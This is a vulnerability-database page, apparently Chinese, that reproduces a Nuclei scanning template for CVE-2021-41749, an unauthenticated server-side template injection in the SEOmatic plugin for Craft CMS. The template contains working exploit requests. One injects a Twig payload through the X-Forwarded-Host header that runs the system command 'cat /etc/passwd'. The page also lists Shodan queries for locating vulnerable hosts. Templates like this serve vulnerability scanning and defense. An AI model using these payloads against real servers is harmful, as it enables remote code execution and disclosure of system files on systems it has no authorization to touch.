CVE-2021-41749: CraftCMS SEOmatic - Server-Side Template Injection

日期: 2025-08-01 | 影响软件: CraftCMS SEOmatic | POC: 已公开

漏洞描述

In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.

PoC代码[已公开]

id: CVE-2021-41749

info:
  name: CraftCMS SEOmatic - Server-Side Template Injection
  author: iamnoooob,ritikchaddha
  severity: critical
  description: |
    In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.
  reference:
    - https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41749
    - https://github.com/nystudio107/craft-seomatic/blob/develop/CHANGELOG.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-41749
    cwe-id: CWE-94
    epss-score: 0.86348
    epss-percentile: 0.99367
    cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nystudio107
    product: seomatic
    framework: craft_cms
    shodan-query:
      - 'X-Powered-By: Craft CMS html:"SEOmatic"'
      - "x-powered-by: craft cms"
      - 'x-powered-by: craft cms html:"seomatic"'
  tags: cve2021,cve,craftcms,cms,ssti,nystudio107,craft_cms
variables:
  num1: "{{rand_int(40000, 44800)}}"
  num2: "{{rand_int(40000, 44800)}}"
  result: "{{to_number(num1)*to_number(num2)}}"
  marker: "{{randstr}}"

http:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}
        Cache-Control: max-age=0

      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb
        Cache-Control: max-age=0

    skip-variables-check: true
    stop-at-first-match: true
    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "/{{marker}}{{result}}") || regex("root:.*:0:0:", body_2)'
          - 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100e3d7c661b2c9be22295706e54eeaeadc2739a85bfeffcf454a7b8da9161daada022006e9997989bcc0ecc7c3a685b1e0217d926eddb60f5a0a78828a7a3537a7e500:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-41749.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CraftCMS SEOmatic 模板注入漏洞(CVE-2021-41749) 无POC

ShowDoc /server/index.php?s=/api/adminUpdate/download 文件上传漏洞（CVE-2021-36440） 无POC

CVE-2021-1497: Cisco HyperFlex HX Data Platform - Remote Command Execution POC

CVE-2021-1498: Cisco HyperFlex HX Data Platform - Remote Command Execution POC

CVE-2021-1499: Cisco HyperFlex HX Data Platform - File Upload Vulnerability POC

ShowDoc /server/index.php?s=/api/adminUpdate/download 文件上传漏洞（CVE-2021-36440）无POC